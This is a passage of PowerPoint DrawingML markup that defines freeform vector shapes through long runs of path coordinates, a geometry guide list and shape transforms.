                      <a:pt x="378" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="792" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="178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00" name="Freeform 2"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="9317087" y="3524861"/>
              <a:ext cx="2201971" cy="2629523"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 819 w 6201"/>
                <a:gd name="T1" fmla="*/ 5428 h 7403"/>
                <a:gd name="T2" fmla="*/ 1821 w 6201"/>
                <a:gd name="T3" fmla="*/ 6306 h 7403"/>
                <a:gd name="T4" fmla="*/ 6200 w 6201"/>
                <a:gd name="T5" fmla="*/ 7402 h 7403"/>
                <a:gd name="T6" fmla="*/ 5181 w 6201"/>
                <a:gd name="T7" fmla="*/ 4127 h 7403"/>
                <a:gd name="T8" fmla="*/ 2693 w 6201"/>
                <a:gd name="T9" fmla="*/ 1890 h 7403"/>
                <a:gd name="T10" fmla="*/ 3748 w 6201"/>
                <a:gd name="T11" fmla="*/ 5376 h 7403"/>
                <a:gd name="T12" fmla="*/ 3265 w 6201"/>
                <a:gd name="T13" fmla="*/ 4998 h 7403"/>
                <a:gd name="T14" fmla="*/ 3853 w 6201"/>
                <a:gd name="T15" fmla="*/ 5066 h 7403"/>
                <a:gd name="T16" fmla="*/ 3832 w 6201"/>
                <a:gd name="T17" fmla="*/ 5324 h 7403"/>
                <a:gd name="T18" fmla="*/ 2567 w 6201"/>
                <a:gd name="T19" fmla="*/ 4242 h 7403"/>
                <a:gd name="T20" fmla="*/ 3260 w 6201"/>
                <a:gd name="T21" fmla="*/ 4840 h 7403"/>
                <a:gd name="T22" fmla="*/ 2687 w 6201"/>
                <a:gd name="T23" fmla="*/ 5287 h 7403"/>
                <a:gd name="T24" fmla="*/ 2430 w 6201"/>
                <a:gd name="T25" fmla="*/ 5161 h 7403"/>
                <a:gd name="T26" fmla="*/ 2052 w 6201"/>
                <a:gd name="T27" fmla="*/ 4872 h 7403"/>
                <a:gd name="T28" fmla="*/ 3202 w 6201"/>
                <a:gd name="T29" fmla="*/ 3764 h 7403"/>
                <a:gd name="T30" fmla="*/ 3779 w 6201"/>
                <a:gd name="T31" fmla="*/ 4956 h 7403"/>
                <a:gd name="T32" fmla="*/ 3328 w 6201"/>
                <a:gd name="T33" fmla="*/ 4237 h 7403"/>
                <a:gd name="T34" fmla="*/ 3638 w 6201"/>
                <a:gd name="T35" fmla="*/ 4163 h 7403"/>
                <a:gd name="T36" fmla="*/ 3816 w 6201"/>
                <a:gd name="T37" fmla="*/ 4835 h 7403"/>
                <a:gd name="T38" fmla="*/ 2976 w 6201"/>
                <a:gd name="T39" fmla="*/ 4137 h 7403"/>
                <a:gd name="T40" fmla="*/ 3281 w 6201"/>
                <a:gd name="T41" fmla="*/ 4315 h 7403"/>
                <a:gd name="T42" fmla="*/ 2750 w 6201"/>
                <a:gd name="T43" fmla="*/ 4310 h 7403"/>
                <a:gd name="T44" fmla="*/ 2992 w 6201"/>
                <a:gd name="T45" fmla="*/ 3985 h 7403"/>
                <a:gd name="T46" fmla="*/ 2625 w 6201"/>
                <a:gd name="T47" fmla="*/ 4111 h 7403"/>
                <a:gd name="T48" fmla="*/ 3160 w 6201"/>
                <a:gd name="T49" fmla="*/ 3785 h 7403"/>
                <a:gd name="T50" fmla="*/ 3958 w 6201"/>
                <a:gd name="T51" fmla="*/ 5334 h 7403"/>
                <a:gd name="T52" fmla="*/ 4032 w 6201"/>
                <a:gd name="T53" fmla="*/ 5056 h 7403"/>
                <a:gd name="T54" fmla="*/ 4121 w 6201"/>
                <a:gd name="T55" fmla="*/ 4919 h 7403"/>
                <a:gd name="T56" fmla="*/ 3932 w 6201"/>
                <a:gd name="T57" fmla="*/ 4620 h 7403"/>
                <a:gd name="T58" fmla="*/ 4131 w 6201"/>
                <a:gd name="T59" fmla="*/ 4305 h 7403"/>
                <a:gd name="T60" fmla="*/ 3611 w 6201"/>
                <a:gd name="T61" fmla="*/ 3885 h 7403"/>
                <a:gd name="T62" fmla="*/ 3433 w 6201"/>
                <a:gd name="T63" fmla="*/ 3627 h 7403"/>
                <a:gd name="T64" fmla="*/ 3559 w 6201"/>
                <a:gd name="T65" fmla="*/ 3276 h 7403"/>
                <a:gd name="T66" fmla="*/ 3334 w 6201"/>
                <a:gd name="T67" fmla="*/ 3549 h 7403"/>
                <a:gd name="T68" fmla="*/ 2629 w 6201"/>
                <a:gd name="T69" fmla="*/ 3082 h 7403"/>
                <a:gd name="T70" fmla="*/ 2856 w 6201"/>
                <a:gd name="T71" fmla="*/ 3244 h 7403"/>
                <a:gd name="T72" fmla="*/ 3123 w 6201"/>
                <a:gd name="T73" fmla="*/ 3597 h 7403"/>
                <a:gd name="T74" fmla="*/ 2897 w 6201"/>
                <a:gd name="T75" fmla="*/ 3859 h 7403"/>
                <a:gd name="T76" fmla="*/ 2399 w 6201"/>
                <a:gd name="T77" fmla="*/ 3607 h 7403"/>
                <a:gd name="T78" fmla="*/ 2367 w 6201"/>
                <a:gd name="T79" fmla="*/ 3617 h 7403"/>
                <a:gd name="T80" fmla="*/ 2052 w 6201"/>
                <a:gd name="T81" fmla="*/ 4090 h 7403"/>
                <a:gd name="T82" fmla="*/ 1952 w 6201"/>
                <a:gd name="T83" fmla="*/ 4127 h 7403"/>
                <a:gd name="T84" fmla="*/ 2556 w 6201"/>
                <a:gd name="T85" fmla="*/ 4148 h 7403"/>
                <a:gd name="T86" fmla="*/ 1958 w 6201"/>
                <a:gd name="T87" fmla="*/ 4862 h 7403"/>
                <a:gd name="T88" fmla="*/ 1480 w 6201"/>
                <a:gd name="T89" fmla="*/ 4499 h 7403"/>
                <a:gd name="T90" fmla="*/ 1858 w 6201"/>
                <a:gd name="T91" fmla="*/ 5040 h 7403"/>
                <a:gd name="T92" fmla="*/ 1984 w 6201"/>
                <a:gd name="T93" fmla="*/ 5140 h 7403"/>
                <a:gd name="T94" fmla="*/ 2399 w 6201"/>
                <a:gd name="T95" fmla="*/ 5329 h 7403"/>
                <a:gd name="T96" fmla="*/ 2887 w 6201"/>
                <a:gd name="T97" fmla="*/ 5413 h 7403"/>
                <a:gd name="T98" fmla="*/ 2719 w 6201"/>
                <a:gd name="T99" fmla="*/ 5670 h 7403"/>
                <a:gd name="T100" fmla="*/ 2776 w 6201"/>
                <a:gd name="T101" fmla="*/ 5759 h 7403"/>
                <a:gd name="T102" fmla="*/ 3044 w 6201"/>
                <a:gd name="T103" fmla="*/ 5439 h 7403"/>
                <a:gd name="T104" fmla="*/ 3895 w 6201"/>
                <a:gd name="T105" fmla="*/ 5413 h 7403"/>
                <a:gd name="T106" fmla="*/ 3317 w 6201"/>
                <a:gd name="T107" fmla="*/ 5791 h 7403"/>
                <a:gd name="T108" fmla="*/ 2488 w 6201"/>
                <a:gd name="T109" fmla="*/ 5806 h 7403"/>
                <a:gd name="T110" fmla="*/ 1721 w 6201"/>
                <a:gd name="T111" fmla="*/ 5245 h 7403"/>
                <a:gd name="T112" fmla="*/ 1480 w 6201"/>
                <a:gd name="T113" fmla="*/ 4499 h 7403"/>
                <a:gd name="T114" fmla="*/ 1669 w 6201"/>
                <a:gd name="T115" fmla="*/ 3759 h 7403"/>
                <a:gd name="T116" fmla="*/ 2446 w 6201"/>
                <a:gd name="T117" fmla="*/ 3129 h 7403"/>
                <a:gd name="T118" fmla="*/ 3317 w 6201"/>
                <a:gd name="T119" fmla="*/ 3129 h 7403"/>
                <a:gd name="T120" fmla="*/ 4126 w 6201"/>
                <a:gd name="T121" fmla="*/ 3817 h 7403"/>
                <a:gd name="T122" fmla="*/ 4278 w 6201"/>
                <a:gd name="T123" fmla="*/ 4468 h 7403"/>
                <a:gd name="T124" fmla="*/ 1611 w 6201"/>
                <a:gd name="T125" fmla="*/ 4032 h 7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201" h="7403">
                  <a:moveTo>
                    <a:pt x="1202" y="1355"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1202" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110" y="5224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215" y="5240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320" y="5261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425" y="5281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525" y="5313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629" y="5350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819" y="5428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="913" y="5476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1008" y="5528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1096" y="5581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181" y="5638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265" y="5701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1343" y="5765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1422" y="5833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1496" y="5906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1569" y="5980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1637" y="6059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1701" y="6137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1764" y="6221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1821" y="6306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1874" y="6394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926" y="6489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1974" y="6583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015" y="6678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2052" y="6773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089" y="6877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2121" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2141" y="7082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2162" y="7187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2178" y="7292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2194" y="7402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6200" y="7402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6200" y="7402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6184" y="7124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6158" y="6851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6121" y="6583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6073" y="6316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6016" y="6053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5943" y="5796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5864" y="5544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5775" y="5292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5675" y="5050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5565" y="4809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5444" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5318" y="4352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5181" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5034" y="3911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4877" y="3701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4714" y="3502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4546" y="3302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4367" y="3113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4184" y="2935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989" y="2762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3790" y="2594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3580" y="2436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3370" y="2289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3150" y="2147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2923" y="2011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2693" y="1890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2456" y="1774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2215" y="1670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968" y="1575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716" y="1491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1459" y="1417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202" y="1355"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="598" y="903"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="199" y="200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002" y="200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598" y="903"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3832" y="5355"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3832" y="5355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3748" y="5376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3658" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3570" y="5397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3475" y="5402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3381" y="5402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3286" y="5397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="5376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="5376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3155" y="5255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187" y="5192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3217" y="5129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3265" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3302" y="4862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3302" y="4862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3364" y="4893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="4924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3491" y="4946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554" y="4967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3611" y="4982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3675" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3738" y="5003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3795" y="5009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3795" y="5009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3822" y="5040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3853" y="5066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3890" y="5082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3932" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3937" y="5192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3922" y="5292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3922" y="5292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="5281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="5281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="5281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="5287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3848" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3832" y="5324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3832" y="5344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3832" y="5355"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2052" y="4872"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2052" y="4872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2099" y="4767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2147" y="4667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2205" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2268" y="4494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2336" y="4421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="4352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="4295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2567" y="4242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2567" y="4242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2593" y="4263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2603" y="4268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="4268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635" y="4268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635" y="4268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698" y="4352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772" y="4436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2845" y="4515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2923" y="4589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3003" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="4725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3170" y="4788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260" y="4840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260" y="4840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3244" y="4909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3228" y="4977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3207" y="5045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3181" y="5108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3150" y="5177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3118" y="5240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3081" y="5308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="5371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="5371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2923" y="5344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2808" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687" y="5287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2567" y="5229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2562" y="5213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2551" y="5197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2540" y="5182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2525" y="5171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2504" y="5161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="5156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467" y="5156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467" y="5156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="5156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2430" y="5161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="5171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2399" y="5182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2399" y="5182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2257" y="5119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2126" y="5050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2126" y="5050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2131" y="5024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2136" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2136" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2126" y="4961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2110" y="4924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2084" y="4893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2052" y="4872"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3459" y="3817"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3459" y="3817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3528" y="3917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3596" y="4016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3596" y="4016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3517" y="4001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3438" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3360" y="3979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="3979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="3979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3244" y="3869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3202" y="3764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3202" y="3764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3312" y="3691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3312" y="3691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3334" y="3701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3354" y="3701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3370" y="3701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3407" y="3748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3407" y="3754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3407" y="3754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3412" y="3774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3423" y="3796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3438" y="3811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3459" y="3817"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3779" y="4956"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="4946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3669" y="4930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3548" y="4893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="4846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3317" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3317" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3328" y="4693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3338" y="4604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3344" y="4509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3344" y="4421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3338" y="4332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3328" y="4237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3312" y="4148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3297" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3297" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3375" y="4064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3449" y="4068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3528" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3596" y="4090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3596" y="4090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3601" y="4105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3606" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3611" y="4137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3628" y="4153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3638" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3654" y="4168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3669" y="4174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3690" y="4179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3690" y="4179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3764" y="4326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3827" y="4479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3874" y="4630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
